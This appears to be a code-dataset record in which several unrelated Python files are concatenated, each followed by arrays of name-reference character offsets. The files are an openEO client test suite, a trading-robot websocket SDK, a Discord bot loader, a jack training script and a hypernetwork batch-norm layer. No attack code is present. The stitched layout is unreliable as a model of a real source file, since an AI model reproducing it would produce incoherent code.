("https://oeo.net/api/v04", ["foo/bar", "/foo/bar"], "https://oeo.net/api/v04/foo/bar"),
("https://oeo.net/api/v04/", ["foo/bar", "/foo/bar"], "https://oeo.net/api/v04/foo/bar"),
("https://oeo.net/api/v04", ["foo/bar/", "/foo/bar/"], "https://oeo.net/api/v04/foo/bar/"),
("https://oeo.net/api/v04/", ["foo/bar/", "/foo/bar/"], "https://oeo.net/api/v04/foo/bar/"),
]
)
def test_rest_api_connection_url_handling(requests_mock, base, paths, expected_path):
"""Test connection __init__ and proper joining of root url and API path"""
conn = RestApiConnection(base)
requests_mock.get(expected_path, text="payload")
requests_mock.post(expected_path, text="payload")
for path in paths:
assert conn.get(path).text == "payload"
assert conn.post(path, {"foo": "bar"}).text == "payload"
def test_rest_api_headers():
conn = RestApiConnection(API_URL)
with requests_mock.Mocker() as m:
def text(request, context):
assert request.headers["User-Agent"].startswith("openeo-python-client")
assert request.headers["X-Openeo-Bar"] == "XY123"
m.get("/foo", text=text)
m.post("/foo", text=text)
conn.get("/foo", headers={"X-Openeo-Bar": "XY123"})
conn.post("/foo", {}, headers={"X-Openeo-Bar": "XY123"})
def test_connection_with_session():
session = mock.Mock()
response = session.request.return_value
response.status_code = 200
response.json.return_value = {"foo": "bar"}
conn = Connection("https://oeo.net/", session=session)
assert conn.capabilities().capabilities == {"foo": "bar"}
session.request.assert_any_call(
url="https://oeo.net/", method="get", headers=mock.ANY, stream=mock.ANY, auth=mock.ANY
)
def test_connect_with_session():
session = mock.Mock()
response = session.request.return_value
response.status_code = 200
response.json.return_value = {"foo": "bar"}
conn = connect("https://oeo.net/", session=session)
assert conn.capabilities().capabilities == {"foo": "bar"}
session.request.assert_any_call(
url="https://oeo.net/", method="get", headers=mock.ANY, stream=mock.ANY, auth=mock.ANY
)
def test_api_error(requests_mock):
conn = Connection(API_URL)
requests_mock.get('https://oeo.net/collections/foobar', status_code=404, json={
"code": "CollectionNotFound", "message": "No such things as a collection 'foobar'", "id": "54321"
})
with pytest.raises(OpenEoApiError) as exc_info:
conn.describe_collection("foobar")
exc = exc_info.value
assert exc.http_status_code == 404
assert exc.code == "CollectionNotFound"
assert exc.message == "No such things as a collection 'foobar'"
assert exc.id == "54321"
assert exc.url is None
def test_api_error_non_json(requests_mock):
conn = Connection(API_URL)
requests_mock.get('https://oeo.net/collections/foobar', status_code=500, text="olapola")
with pytest.raises(OpenEoApiError) as exc_info:
conn.describe_collection("foobar")
exc = exc_info.value
assert exc.http_status_code == 500
assert exc.code == "unknown"
assert exc.message == "olapola"
assert exc.id is None
assert exc.url is None
def test_authenticate_basic(requests_mock):
conn = Connection(API_URL)
def text_callback(request, context):
assert request.headers["Authorization"] == "Basic am9objpqMGhu"
return '{"access_token":"w3lc0m3"}'
requests_mock.get('https://oeo.net/credentials/basic', text=text_callback)
assert isinstance(conn.auth, NullAuth)
conn.authenticate_basic(username="john", password="j0hn")
assert isinstance(conn.auth, BearerAuth)
assert conn.auth.bearer == "w3lc0m3"
def test_authenticate_oidc(oidc_test_setup):
# see test/rest/conftest.py for `oidc_test_setup` fixture
client_id = "myclient"
oidc_discovery_url = "https://oeo.net/credentials/oidc"
state, webbrowser_open = oidc_test_setup(client_id=client_id, oidc_discovery_url=oidc_discovery_url)
# With all this set up, kick off the openid connect flow
conn = Connection(API_URL)
assert isinstance(conn.auth, NullAuth)
conn.authenticate_OIDC(client_id=client_id, webbrowser_open=webbrowser_open)
assert isinstance(conn.auth, BearerAuth)
assert conn.auth.bearer == state["access_token"]
def test_load_collection_arguments(requests_mock):
conn = Connection(API_URL)
requests_mock.get(API_URL, json={"version": "0.4.0"})
requests_mock.get(API_URL + "collections/FOO", json={
"properties": {"eo:bands": [{"name": "red"}, {"name": "green"}, {"name": "blue"}]}
})
spatial_extent = {"west": 1, "south": 2, "east": 3, "north": 4}
temporal_extent = ["2019-01-01", "2019-01-22"]
im = conn.load_collection(
"FOO", spatial_extent=spatial_extent, temporal_extent=temporal_extent, bands=["red", "green"]
)
node = im.graph[im.node_id]
assert node["process_id"] == "load_collection"
assert node["arguments"] == {
"id": "FOO",
"spatial_extent": spatial_extent,
"temporal_extent": temporal_extent,
"bands": ["red", "green"]
}
| [
[
[
7,
28
],
[
2044,
2048
],
[
2391,
2395
],
[
2408,
2412
],
[
2423,
2427
],
[
2487,
2491
],
[
2831,
2835
],
[
2848,
2852
],
[
2863,
2867
]
],
[
[
37,
43
],
[
244,
250
],
[
3152,
3158
],
[
3649,
3655
]
],
[
[
51,
64
],
[
1588,
1601
]
],
[
[
100,
108
],
[
4270,
4278
],
[
4855,
4863
]
],
[
[
110,
120
],
[
4375,
4385
],
[
4979,
4989
]
],
[
[
156,
166
],
[
2190,
2200
],
[
2926,
2936
],
[
3527,
3537
],
[
3978,
3988
],
[
4802,
4812
],
[
5108,
5118
]
],
[
[
168,
185
],
[
1243,
1260
],
[
1552,
1569
]
],
[
[
187,
194
],
[
2633,
2640
]
],
[
[
196,
210
],
[
3166,
3180
],
[
3663,
3677
]
],
[
[
212,
219
],
[
1570,
1577
],
[
2937,
2944
],
[
3538,
3545
],
[
3989,
3996
],
[
4813,
4820
],
[
5119,
5126
],
[
5150,
5157
],
[
5208,
5215
]
],
[
[
1071,
1108
]
],
[
[
1516,
1537
]
],
[
[
1998,
2026
]
],
[
[
2444,
2469
]
],
[
[
2884,
2898
]
],
[
[
3476,
3499
]
],
[
[
3927,
3950
]
],
[
[
4434,
4456
]
],
[
[
5050,
5080
]
]
] |
import asyncio
import json
import logging
from datetime import datetime
from typing import Any, Dict, Iterable, List, Optional, Set, Union
import httpx
import websockets
from websockets import exceptions
logger = logging.getLogger("yufuquantsdk")
class WebsocketAPIClient:
def __init__(self, uri: str, ws: websockets.WebSocketClientProtocol = None) -> None:
self._uri: str = uri
self._ws: websockets.WebSocketClientProtocol = ws
self._authed: bool = False
self._api_key = ""
self._sub_topics: Set[str] = set()
self._inputs: asyncio.Queue[str] = asyncio.Queue()
self._outputs: asyncio.Queue[str] = asyncio.Queue(maxsize=100)
self._run_task: asyncio.Task[Any] = asyncio.get_event_loop().create_task(
self._run()
)
async def auth(self, api_key: str):
message = {
"cmd": "auth",
"api_key": api_key,
}
await self._deliver(json.dumps(message))
self._authed = True
self._api_key = api_key
async def sub(self, topics: Iterable[str]):
# Remove duplicated topics
if not isinstance(topics, set):
topics = set(topics)
message = {
"cmd": "sub",
"topics": list(topics), # Object of type set is not JSON serializable
}
await self._deliver(json.dumps(message))
self._sub_topics = topics
async def unsub(self, topics: Iterable[str]):
# Remove duplicated topics
if not isinstance(topics, set):
topics = set(topics)
message = {
"cmd": "unsub",
"topics": list(topics),
}
await self._deliver(json.dumps(message))
self._sub_topics = self._sub_topics - topics
async def robot_ping(self):
data = {"timestamp": int(datetime.now().timestamp() * 1000)}
message = {"category": "robotPing", "data": data}
await self._broadcast(message)
async def robot_log(self, text: str, level: str = "info"):
data = {
"text": text,
"level": level,
"timestamp": int(datetime.now().timestamp()) * 1000,
}
message = {"category": "robotLog", "data": data}
await self._broadcast(message)
async def robot_position_store(self, positions):
data = {
"updatedAt": datetime.now().isoformat(),
"positions": positions,
}
message = {"category": "robotPositionStore", "data": data}
await self._broadcast(message)
async def robot_order_store(self, orders):
data = {
"updatedAt": datetime.now().isoformat(),
"orders": orders,
}
message = {"category": "robotOrderStore", "data": data}
await self._broadcast(message)
async def robot_strategy_store(self, data):
d = {
"updatedAt": datetime.now().isoformat(),
"data": data,
}
message = {"category": "robotStrategyStore", "data": d}
await self._broadcast(message)
async def _connect(self, **kwargs):
# disable ping
kwargs["ping_interval"] = None
retry_count = 0
for i in range(3):
try:
self._ws = await websockets.connect(self._uri, **kwargs)
break
except Exception as exc:
logger.exception("Failed to connect to %s: %s.", self._uri, exc)
retry_count += 1
if retry_count >= 3:
raise
await asyncio.sleep(10)
logger.info("Connected to %s.", self._uri)
async def _reconnect(self):
await self._connect()
if self._authed:
await self.auth(self._api_key)
if len(self._sub_topics) > 0:
await self.sub(self._sub_topics)
logger.info("Reconnected to %s.", self._uri)
async def _deliver(self, s: str):
await self._inputs.put(s)
async def _send(self, s: str):
assert self._ws is not None, "No connection!"
try:
await self._ws.send(s)
logger.debug(">>> %s", s)
except websockets.ConnectionClosed as exc:
logger.exception(exc)
await self._reconnect()
async def _broadcast(self, message: Dict):
data = {"cmd": "broadcast", "message": message}
await self._deliver(json.dumps(data))
async def _pong(self, message: Dict[str, int]):
await self._send(json.dumps({"pong": message["ping"]}))
# todo: handle stop signal
async def _run(self):
await self._connect()
try:
while True:
incoming: asyncio.Task[Any] = asyncio.create_task(self._ws.recv())
outgoing: asyncio.Task[Any] = asyncio.create_task(self._inputs.get())
done: Set[asyncio.Future[Any]]
pending: Set[asyncio.Future[Any]]
done, pending = await asyncio.wait(
[incoming, outgoing], return_when=asyncio.FIRST_COMPLETED
)
# Cancel pending tasks to avoid leaking them.
if incoming in pending:
incoming.cancel()
if outgoing in pending:
outgoing.cancel()
if incoming in done:
try:
message = incoming.result()
logger.debug("<<< %s", message)
except websockets.ConnectionClosed as exc:
logger.exception(exc)
await self._reconnect()
else:
decoded = json.loads(message)
if "ping" in decoded:
await self._pong(decoded)
else:
try:
self._outputs.put_nowait(decoded)
except asyncio.QueueFull:
logger.warning("The outputs queue is full.")
if outgoing in done:
message = outgoing.result()
await self._send(message)
finally:
await self.close()
async def close(self):
ws = self._ws
self._ws = None
await ws.close()
close_status = exceptions.format_close(ws.close_code, ws.close_reason)
logger.info(f"Connection closed: {close_status}.")
ROBOT_REQ_PATH = "/robots/{robot_id}/"
ROBOT_PING_REQ_PATH = "/robots/{robot_id}/ping/"
ROBOT_ASSET_RECORD_REQ_PATH = "/robots/{robot_id}/assetRecord/"
ROBOT_STRATEGY_PARAMETERS_REQ_PATH = "/robots/{robot_id}/strategyParameters/"
ROBOT_CREDENTIAL_KEY_REQ_PATH = "/robots/{robot_id}/credentialKey/"
ROBOT_POSITION_STORE_REQ_PATH = "/robots/{robot_id}/positionStore/"
ROBOT_ORDER_STORE_REQ_PATH = "/robots/{robot_id}/orderStore/"
ROBOT_STRATEGY_STORE_REQ_PATH = "/robots/{robot_id}/strategyStore/"
class RESTAPIClient:
def __init__(self, base_url: str, api_key: str):
self._base_url: str = base_url.rstrip("/")
self._api_key: str = api_key
async def get_robot(self, robot_id: int):
req_path = ROBOT_REQ_PATH.format(robot_id=robot_id)
return await self._request("GET", req_path)
async def update_robot_asset_record(self, robot_id: int, data: Dict[str, Any]):
req_path = ROBOT_ASSET_RECORD_REQ_PATH.format(robot_id=robot_id)
return await self._request("PATCH", req_path, data=data)
async def update_robot_strategy_store(self, robot_id: int, data: Dict[str, Any]):
req_path = ROBOT_STRATEGY_STORE_REQ_PATH.format(robot_id=robot_id)
return await self._request("PUT", req_path, data=data)
async def update_robot_position_store(
self, robot_id: int, data: List[Dict[str, Any]]
):
req_path = ROBOT_POSITION_STORE_REQ_PATH.format(robot_id=robot_id)
return await self._request("PUT", req_path, data=data)
async def update_robot_order_store(self, robot_id: int, data: List[Dict[str, Any]]):
req_path = ROBOT_ORDER_STORE_REQ_PATH.format(robot_id=robot_id)
return await self._request("PUT", req_path, data=data)
async def ping_robot(self, robot_id: int):
req_path = ROBOT_PING_REQ_PATH.format(robot_id=robot_id)
return await self._request("POST", req_path)
async def get_robot_strategy_parameters(self, robot_id: int):
req_path = ROBOT_STRATEGY_PARAMETERS_REQ_PATH.format(robot_id=robot_id)
return await self._request("GET", req_path)
async def get_robot_credential_key(self, robot_id: int):
req_path = ROBOT_CREDENTIAL_KEY_REQ_PATH.format(robot_id=robot_id)
return await self._request("GET", req_path)
async def _request(
self,
method: str,
req_path: str,
headers: Optional[Dict[str, str]] = None,
params: Optional[Dict[str, str]] = None,
data: Optional[Union[Dict, List]] = None,
auth: bool = True,
):
req_headers = {"Content-Type": "application/json"}
if auth:
req_headers["X-Api-Key"] = self._api_key
if headers is not None:
req_headers.update(headers)
url = self._base_url + req_path
async with httpx.AsyncClient() as client:
logger.debug(
"%s %s, Request<headers=%s params=%s data=%s>",
method,
url,
req_headers,
params,
data,
)
res = await client.request(
method,
url,
headers=req_headers,
params=params,
json=data,
timeout=5,
)
http_text = res.text
logger.debug(
"%s %s, Response<status_code=%s headers=%s http_text=%s>",
method,
url,
res.status_code,
req_headers,
http_text,
)
res.raise_for_status()
            if res.status_code == 204:  # 204 No Content has no JSON body to decode
return None
return res.json()
| [
[
[
7,
14
],
[
601,
608
],
[
580,
587
],
[
661,
668
],
[
640,
647
],
[
732,
739
],
[
712,
719
],
[
3578,
3585
],
[
4725,
4732
],
[
4705,
4712
],
[
4808,
4815
],
[
4788,
4795
],
[
4875,
4882
],
[
4925,
4932
],
[
4984,
4991
],
[
5052,
5059
],
[
5985,
5992
]
],
[
[
22,
26
],
[
962,
966
],
[
1368,
1372
],
[
1705,
1709
],
[
4419,
4423
],
[
4515,
4519
],
[
5701,
5705
]
],
[
[
34,
41
],
[
215,
222
]
],
[
[
63,
71
],
[
1845,
1853
],
[
2142,
2150
],
[
2380,
2388
],
[
2650,
2658
],
[
2909,
2917
]
],
[
[
91,
94
],
[
725,
728
],
[
4718,
4721
],
[
4801,
4804
],
[
4890,
4893
],
[
4940,
4943
],
[
7397,
7400
],
[
7622,
7625
],
[
7861,
7864
],
[
8094,
8097
]
],
[
[
96,
100
],
[
4328,
4332
],
[
4473,
4477
],
[
7387,
7391
],
[
7612,
7616
],
[
7851,
7855
],
[
8084,
8088
],
[
8900,
8904
],
[
8949,
8953
],
[
9002,
9006
]
],
[
[
102,
110
],
[
1076,
1084
],
[
1458,
1466
]
],
[
[
112,
116
],
[
7846,
7850
],
[
8079,
8083
],
[
9008,
9012
]
],
[
[
118,
126
],
[
8891,
8899
],
[
8940,
8948
],
[
8987,
8995
]
],
[
[
128,
131
],
[
541,
544
],
[
4871,
4874
],
[
4921,
4924
]
],
[
[
133,
138
],
[
8996,
9001
]
],
[
[
147,
152
],
[
9318,
9323
]
],
[
[
160,
170
],
[
314,
324
],
[
413,
423
],
[
3280,
3290
],
[
4181,
4191
],
[
5511,
5521
]
],
[
[
194,
204
],
[
6383,
6393
]
],
[
[
206,
212
],
[
3395,
3401
],
[
3604,
3610
],
[
3872,
3878
],
[
4140,
4146
],
[
4229,
4235
],
[
5452,
5458
],
[
6036,
6042
],
[
5571,
5577
],
[
6447,
6453
],
[
9361,
9367
],
[
9839,
9845
]
],
[
[
257,
275
]
],
[
[
6500,
6514
],
[
7226,
7240
]
],
[
[
6539,
6558
],
[
8304,
8323
]
],
[
[
6588,
6615
],
[
7423,
7450
]
],
[
[
6652,
6686
],
[
8489,
8523
]
],
[
[
6730,
6759
],
[
8683,
8712
]
],
[
[
6798,
6827
],
[
7893,
7922
]
],
[
[
6866,
6892
],
[
8121,
8147
]
],
[
[
6928,
6957
],
[
7648,
7677
]
],
[
[
7004,
7017
]
]
] |
import discord
from discord.ext import commands
import os
intents = discord.Intents.default()
intents.members = True
testing = False
client = commands.Bot(command_prefix = "-", case_insensitive = True, intents=intents)
client.remove_command('help')
for filename in os.listdir('./cogs'):
if filename.endswith('.py'):
client.load_extension(f'cogs.{filename[:-3]}')
client.run('# Discord Bot Token here') | [
[
[
7,
14
],
[
73,
80
]
],
[
[
40,
48
],
[
154,
162
]
],
[
[
57,
59
],
[
283,
285
]
],
[
[
63,
70
],
[
100,
107
],
[
222,
229
]
],
[
[
126,
133
]
],
[
[
145,
151
],
[
234,
240
],
[
348,
354
],
[
398,
404
]
],
[
[
271,
279
],
[
313,
321
],
[
378,
386
]
]
] |
# -*- coding: utf-8 -*-
import logging
import math
import os
import random
import shutil
import tensorflow as tf
from jack import readers
from jack.core.tensorflow import TFReader
from jack.eval import evaluate_reader, pretty_print_results
from jack.util.hooks import LossHook, ExamplesPerSecHook, ETAHook
logger = logging.getLogger(__name__)
def train(reader, train_data, test_data, dev_data, configuration: dict, debug=False):
if isinstance(reader, TFReader):
train_tensorflow(reader, train_data, test_data, dev_data, configuration, debug)
else:
train_pytorch(reader, train_data, test_data, dev_data, configuration, debug)
def train_tensorflow(reader, train_data, test_data, dev_data, configuration: dict, debug=False):
import tensorflow as tf
seed = configuration.get('seed', 0)
# make everything deterministic
random.seed(seed)
tf.set_random_seed(seed)
clip_value = configuration.get('clip_value')
batch_size = configuration.get('batch_size')
dev_batch_size = configuration.get('dev_batch_size') or batch_size
epochs = configuration.get('epochs')
l2 = configuration.get('l2')
optimizer = configuration.get('optimizer')
learning_rate = configuration.get('learning_rate')
min_learning_rate = configuration.get('min_learning_rate')
learning_rate_decay = configuration.get('learning_rate_decay')
log_interval = configuration.get('log_interval')
validation_interval = configuration.get('validation_interval')
tensorboard_folder = configuration.get('tensorboard_folder')
reader_type = configuration.get('reader')
save_dir = configuration.get('save_dir')
write_metrics_to = configuration.get('write_metrics_to')
if clip_value != 0.0:
clip_value = - abs(clip_value), abs(clip_value)
learning_rate = tf.get_variable("learning_rate", initializer=learning_rate, dtype=tf.float32, trainable=False)
lr_decay_op = learning_rate.assign(tf.maximum(learning_rate_decay * learning_rate, min_learning_rate))
name_to_optimizer = {
'gd': tf.train.GradientDescentOptimizer,
'adam': tf.train.AdamOptimizer,
'adagrad': tf.train.AdagradOptimizer,
'adadelta': tf.train.AdadeltaOptimizer,
'rmsprop': tf.train.RMSPropOptimizer
}
if optimizer not in name_to_optimizer:
raise ValueError('Unknown optimizer: {}'.format(optimizer))
tf_optimizer_class = name_to_optimizer[optimizer]
tf_optimizer = tf_optimizer_class(learning_rate=learning_rate)
sw = None
if tensorboard_folder is not None:
if os.path.exists(tensorboard_folder):
shutil.rmtree(tensorboard_folder)
sw = tf.summary.FileWriter(tensorboard_folder)
# Hooks
iter_interval = 1 if debug else log_interval
hooks = [LossHook(reader, iter_interval, summary_writer=sw),
ETAHook(reader, iter_interval, int(math.ceil(len(train_data) / batch_size)), epochs),
ExamplesPerSecHook(reader, batch_size, iter_interval, sw)]
preferred_metric, best_metric = readers.eval_hooks[reader_type].preferred_metric_and_initial_score()
def side_effect(metrics, prev_metric):
"""Returns: a state (in this case a metric) that is used as input for the next call"""
if prev_metric is None: # store whole reader only at beginning of training
reader.store(save_dir)
m = metrics[preferred_metric]
if prev_metric is not None and m < prev_metric:
reader.session.run(lr_decay_op)
logger.info("Decayed learning rate to: %.5f" % reader.session.run(learning_rate))
elif m > best_metric[0] and save_dir is not None:
best_metric[0] = m
reader.model_module.store(os.path.join(save_dir, "model_module"))
logger.info("Saving reader to: %s" % save_dir)
return m
# this is the standard hook for the reader
hooks.append(readers.eval_hooks[reader_type](
reader, dev_data, dev_batch_size, summary_writer=sw, side_effect=side_effect,
iter_interval=validation_interval,
epoch_interval=(1 if validation_interval is None else None),
write_metrics_to=write_metrics_to))
# Train
reader.train(tf_optimizer, train_data, batch_size, max_epochs=epochs, hooks=hooks,
l2=l2, clip=clip_value, clip_op=tf.clip_by_value, summary_writer=sw)
# Test final reader
if dev_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, dev_data, batch_size)
logger.info("############### Results on the Dev Set##############")
pretty_print_results(result_dict)
if test_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, test_data, batch_size)
logger.info("############### Results on the Test Set##############")
pretty_print_results(result_dict)
def train_pytorch(reader, train_data, test_data, dev_data, configuration: dict, debug=False):
import torch
seed = configuration.get('seed')
# make everything deterministic
random.seed(seed)
torch.manual_seed(seed)
clip_value = configuration.get('clip_value')
batch_size = configuration.get('batch_size')
epochs = configuration.get('epochs')
l2 = configuration.get('l2')
optimizer = configuration.get('optimizer')
learning_rate = configuration.get('learning_rate')
learning_rate_decay = configuration.get('learning_rate_decay')
log_interval = configuration.get('log_interval')
validation_interval = configuration.get('validation_interval')
tensorboard_folder = configuration.get('tensorboard_folder')
model = configuration.get('reader')
save_dir = configuration.get('save_dir')
write_metrics_to = configuration.get('write_metrics_to')
# need setup here already :(
reader.setup_from_data(train_data, is_training=True)
if clip_value != 0.0:
clip_value = - abs(clip_value), abs(clip_value)
name_to_optimizer = {
'gd': torch.optim.SGD,
'adam': torch.optim.Adam,
'adagrad': torch.optim.Adagrad,
'adadelta': torch.optim.Adadelta
}
if optimizer not in name_to_optimizer:
raise ValueError('Unknown optimizer: {}'.format(optimizer))
torch_optimizer_class = name_to_optimizer[optimizer]
params = list(reader.model_module.prediction_module.parameters())
params.extend(reader.model_module.loss_module.parameters())
torch_optimizer = torch_optimizer_class(params, lr=learning_rate)
sw = None
if tensorboard_folder is not None:
if os.path.exists(tensorboard_folder):
shutil.rmtree(tensorboard_folder)
sw = tf.summary.FileWriter(tensorboard_folder)
# Hooks
iter_interval = 1 if debug else log_interval
hooks = [LossHook(reader, iter_interval, summary_writer=sw),
ExamplesPerSecHook(reader, batch_size, iter_interval, sw)]
preferred_metric, best_metric = readers.eval_hooks[model].preferred_metric_and_initial_score()
def side_effect(metrics, prev_metric):
"""Returns: a state (in this case a metric) that is used as input for the next call"""
m = metrics[preferred_metric]
if prev_metric is not None and m < prev_metric:
for param_group in torch_optimizer.param_groups:
param_group['lr'] *= learning_rate_decay
logger.info("Decayed learning rate to: %.5f" % param_group['lr'])
elif m > best_metric[0] and save_dir is not None:
best_metric[0] = m
if prev_metric is None: # store whole model only at beginning of training
reader.store(save_dir)
else:
reader.model_module.store(os.path.join(save_dir, "model_module"))
logger.info("Saving model to: %s" % save_dir)
return m
# this is the standard hook for the model
hooks.append(readers.eval_hooks[model](
reader, dev_data, batch_size, summary_writer=sw, side_effect=side_effect,
iter_interval=validation_interval,
epoch_interval=(1 if validation_interval is None else None),
write_metrics_to=write_metrics_to))
# Train
reader.train(torch_optimizer, train_data, batch_size, max_epochs=epochs, hooks=hooks,
l2=l2, clip=clip_value)
# Test final model
if dev_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, dev_data, batch_size)
logger.info("############### Results on the Dev Set##############")
pretty_print_results(result_dict)
if test_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, test_data, batch_size)
logger.info("############### Results on the Test Set##############")
pretty_print_results(result_dict)
| [
[
[
32,
39
],
[
319,
326
]
],
[
[
47,
51
],
[
2901,
2905
]
],
[
[
59,
61
],
[
2589,
2591
],
[
6663,
6665
],
[
3747,
3749
],
[
7807,
7809
]
],
[
[
69,
75
],
[
863,
869
],
[
5151,
5157
]
],
[
[
83,
89
],
[
2637,
2643
],
[
6711,
6717
]
],
[
[
98,
114
],
[
6758,
6760
]
],
[
[
133,
140
],
[
3061,
3068
],
[
3928,
3935
],
[
7036,
7043
],
[
7986,
7993
]
],
[
[
174,
182
],
[
461,
469
]
],
[
[
205,
220
],
[
4520,
4535
],
[
4793,
4808
],
[
8525,
8540
],
[
8798,
8813
]
],
[
[
222,
242
],
[
4651,
4671
],
[
4926,
4946
],
[
8656,
8676
],
[
8931,
8951
]
],
[
[
271,
279
],
[
2801,
2809
],
[
6875,
6883
]
],
[
[
281,
299
],
[
2965,
2983
],
[
6940,
6958
]
],
[
[
301,
308
],
[
2866,
2873
]
],
[
[
310,
316
],
[
4575,
4581
],
[
4849,
4855
],
[
8580,
8586
],
[
8854,
8860
],
[
3538,
3544
],
[
3799,
3805
],
[
7466,
7472
],
[
7859,
7865
]
],
[
[
353,
358
]
],
[
[
661,
677
],
[
480,
496
]
],
[
[
4966,
4979
],
[
578,
591
]
]
] |
#!/usr/bin/env python3
# Copyright 2019 Christian Henning
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
- **title** :utils/batchnorm_layer.py
- **author** :ch
- **contact** :henningc@ethz.ch
- **created** :09/02/2019
- **version** :1.0
- **python_version** :3.6.8
Implementation of a hypernet compatible batchnorm layer.
The joint use of batch-normalization and hypernetworks is not straightforward,
mainly because the statistics accumulated by the batch-norm operation
expect the weights of the main network to change only slowly. If a hypernetwork
replaces the whole set of weights, the statistics previously estimated by the
batch-norm layer might be completely off.
To circumvent this problem, we provide multiple solutions:
- In a continual learning setting with one set of weights per task, we can
simply estimate and store statistics per task (hence, the batch-norm
operation has to be conditioned on the task).
- The statistics are distilled into the hypernetwork. This would require
the addition of an extra loss term.
- The statistics can be treated as parameters that are outputted by the
hypernetwork. In this case, nothing enforces that these "statistics"
behave similar to statistics that would result from a running estimate
(hence, the resulting operation might have nothing in common with batch-
norm).
- Always use the statistics estimated on the current batch.
Note, we also provide the option of turning off the statistics, in which case
the statistics will be set to zero mean and unit variance. This is helpful when
interpreting batch-normalization as a general form of gain modulation (i.e.,
just applying a shift and scale to neural activities).
"""
from warnings import warn
import torch
import torch.nn as nn
import torch.nn.functional as F
class BatchNormLayer(nn.Module):
r"""Hypernetwork-compatible batch-normalization layer.
Note, batch normalization performs the following operation
.. math::
y = \frac{x - \mathrm{E}[x]}{\sqrt{\mathrm{Var}[x] + \epsilon}} * \
\gamma + \beta
This class allows to deviate from this standard implementation in order to
provide the flexibility required when using hypernetworks. Therefore, we
slightly change the notation to
.. math::
y = \frac{x - m_{\text{stats}}^{(t)}}{\sqrt{v_{\text{stats}}^{(t)} + \
\epsilon}} * \gamma^{(t)} + \beta^{(t)}
We use this notation to highlight that the running statistics
:math:`m_{\text{stats}}^{(t)}` and :math:`v_{\text{stats}}^{(t)}` are not
necessarily estimates resulting from mean and variance computation but might
be learned parameters (e.g., the outputs of a hypernetwork).
We additionally use the superscript :math:`(t)` to denote that the gain
:math:`\gamma`, offset :math:`\beta` and statistics may be dynamically
selected based on some external context information.
This class provides the possibility to checkpoint statistics
:math:`m_{\text{stats}}^{(t)}` and :math:`v_{\text{stats}}^{(t)}`, but
**not** gains and offsets.
.. note::
If context-dependent gains :math:`\gamma^{(t)}` and offsets
:math:`\beta^{(t)}` are required, then they have to be maintained
externally, e.g., via a task-conditioned hypernetwork (see
`this paper`_ for an example) and passed to the :meth:`forward` method.
.. _this paper: https://arxiv.org/abs/1906.00695
Attributes:
weights: A list of all internal weights of this layer. If all
weights are assumed to be generated externally, then this
attribute will be ``None``.
param_shapes: A list of list of integers. Each list represents the
shape of a parameter tensor. Note, this attribute is
independent of the attribute :attr:`weights`, it always comprises
the shapes of all weight tensors as if the network would be stand-
alone (i.e., no weights being passed to the :meth:`forward` method).
Note, unless ``learnable_stats`` is enabled, the layer statistics
are not considered here.
hyper_shapes: A list of list of integers. Each list represents the
shape of a weight tensor that can be passed to the :meth:`forward`
method. If all weights are maintained internally, then this
attribute will be ``None``.
Specifically, this attribute is controlled by the argument
``affine``. If ``affine`` is ``True``, this attribute will be
``None``. Otherwise this attribute contains the shape of
:math:`\gamma` and :math:`\beta`.
num_stats: The number :math:`T` of internally managed statistics
:math:`\{(m_{\text{stats}}^{(1)}, v_{\text{stats}}^{(1)}), \dots, \
(m_{\text{stats}}^{(T)}, v_{\text{stats}}^{(T)}) \}`. This number is
            incremented every time the method :meth:`checkpoint_stats` is called.
"""
def __init__(self, num_features, momentum=0.1, affine=True,
track_running_stats=True, frozen_stats=False,
learnable_stats=False):
r"""
Args:
num_features: See argument ``num_features``, for instance, of class
:class:`torch.nn.BatchNorm1d`.
momentum: See argument ``momentum`` of class
:class:`torch.nn.BatchNorm1d`.
affine: See argument ``affine`` of class
:class:`torch.nn.BatchNorm1d`. If set to :code:`False`, the
input activity will simply be "whitened" according to the
applied layer statistics (except if gain :math:`\gamma` and
offset :math:`\beta` are passed to the :meth:`forward` method).
Note, if ``learnable_stats`` is :code:`False`, then setting
``affine`` to :code:`False` results in no learnable weights for
this layer (running stats might still be updated, but not via
gradient descent).
Note, even if this option is ``False``, one may still pass a
gain :math:`\gamma` and offset :math:`\beta` to the
:meth:`forward` method.
track_running_stats: See argument ``track_running_stats`` of class
:class:`torch.nn.BatchNorm1d`.
frozen_stats: If ``True``, the layer statistics are frozen at their
initial values of :math:`\gamma = 1` and :math:`\beta = 0`,
i.e., layer activity will not be whitened.
Note, this option requires ``track_running_stats`` to be set to
``False``.
learnable_stats: If ``True``, the layer statistics are initialized
as learnable parameters (:code:`requires_grad=True`).
Note, these extra parameters will be maintained internally and
not added to the :attr:`weights`. Statistics can always be
maintained externally and passed to the :meth:`forward` method.
Note, this option requires ``track_running_stats`` to be set to
``False``.
"""
super(BatchNormLayer, self).__init__()
if learnable_stats:
# FIXME We need our custom stats computation for this.
# The running stats updated by `torch.nn.functional.batch_norm` do
# not allow backpropagation.
# See here on how they are computed:
# https://github.com/pytorch/pytorch/blob/96fe2b4ecbbd02143d95f467655a2d697282ac32/aten/src/ATen/native/Normalization.cpp#L137
raise NotImplementedError('Option "learnable_stats" has not been ' +
'implemented yet!')
if momentum is None:
# If one wants to implement this, then please note that the
# attribute `num_batches_tracked` has to be added. Also, note the
# extra code for computing the momentum value in the forward method
# of class `_BatchNorm`:
# https://pytorch.org/docs/stable/_modules/torch/nn/modules/batchnorm.html#_BatchNorm
            raise NotImplementedError('This reimplementation of PyTorch\'s ' +
'batchnorm layer does not support ' +
'setting "momentum" to None.')
if learnable_stats and track_running_stats:
raise ValueError('Option "track_running_stats" must be set to ' +
'False when enabling "learnable_stats".')
if frozen_stats and track_running_stats:
raise ValueError('Option "track_running_stats" must be set to ' +
'False when enabling "frozen_stats".')
self._num_features = num_features
self._momentum = momentum
self._affine = affine
self._track_running_stats = track_running_stats
self._frozen_stats = frozen_stats
self._learnable_stats = learnable_stats
